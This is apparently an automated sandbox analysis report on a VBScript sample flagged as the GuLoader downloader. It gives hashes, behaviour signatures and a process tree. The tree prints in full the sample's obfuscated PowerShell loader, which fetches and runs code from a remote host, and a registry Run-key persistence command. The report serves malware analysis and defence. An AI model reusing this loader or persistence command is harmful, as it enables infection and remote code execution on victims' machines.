Overview

overview

10

Static

static

1

c950aba206...48.vbs

windows7-x64

10

c950aba206...48.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    03/05/2024, 02:03

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748.vbs

  • Size

    210KB

  • MD5

    5c7e4886e009c7d2908ec633bf48cf8e

  • SHA1

    72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3

  • SHA256

    c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748

  • SHA512

    e7910dd42402712860ff660e699707d3c0ae6e4ba8eb8292a8a01de8a22a78bd86272f9668ae4fe260c9af499bbc8477d8d8df115a917040606be6c9cb7736f1

  • SSDEEP

    6144:wyJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQKi:lcKJkRH3Y

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\ping.exe
        ping google.com -n 1
        3⤵
        • Runs ping.exe
        PID:2652
      • C:\Windows\System32\ping.exe
        ping %.%.%.%
        3⤵
        • Runs ping.exe
        PID:2528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir
        3⤵
          PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
            4⤵
              PID:2520
            • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                5⤵
                  PID:2204
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  5⤵
                  • Suspicious use of NtCreateThreadExHideFromDebugger
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of WriteProcessMemory
                  PID:2580
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:328
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                      7⤵
                      • Adds Run key to start application
                      • Modifies registry key
                      PID:1632
          • C:\Windows\SysWOW64\xcopy.exe
            "C:\Windows\SysWOW64\xcopy.exe"
            2⤵
              PID:1636

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OYRDYBNDBWF5ANZQ6QJ.temp
                  Filesize

                  7KB

                  MD5

                  4c4db2d57128625de9a241f04b517d51

                  SHA1

                  f2e57269420dc75d751cbdff8a02111d8a1e898a

                  SHA256

                  e1752c879ed8275e9577a4deb84f0a44381fa5962366576c789fd2d38bc24622

                  SHA512

                  489e8fa2f37290875c1dae50d269dc6a5065cf25b92e49704458e23ce8c46c125db3c30b8baa33c5d61f47eb9c644064d1441c4941609fde8cce31828ee017fc

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Sagsgningerne.Int
                  Filesize

                  453KB

                  MD5

                  c7906dd3affb5ab9d5b82f6e14064c4b

                  SHA1

                  bdc1903a713b8e82e10d1acada68110988885416

                  SHA256

                  1be80920d652fc9bf4cd1a46eefcded743b7d37b3eed7c13446974119bbd1795

                  SHA512

                  ab65febd4ec13bc44a818d61585e7c072c2c4c4723e3f469004db860a5135ca3bdd1ac0037938c68d38fda920d59f73332213a3801f104dad17edb82338613b5

                  Download Submit

                • memory/1196-30-0x0000000003B50000-0x0000000003C50000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2564-21-0x000000001B680000-0x000000001B962000-memory.dmp

                  Filesize

                  2.9MB

                  Download

                • memory/2564-22-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/2580-29-0x0000000000590000-0x0000000005B0E000-memory.dmp

                  Filesize

                  85.5MB

                  Download

                • memory/2580-31-0x0000000000590000-0x0000000005B0E000-memory.dmp

                  Filesize

                  85.5MB

                  Download

                • memory/2664-28-0x0000000006470000-0x000000000B9EE000-memory.dmp

                  Filesize

                  85.5MB

                  Download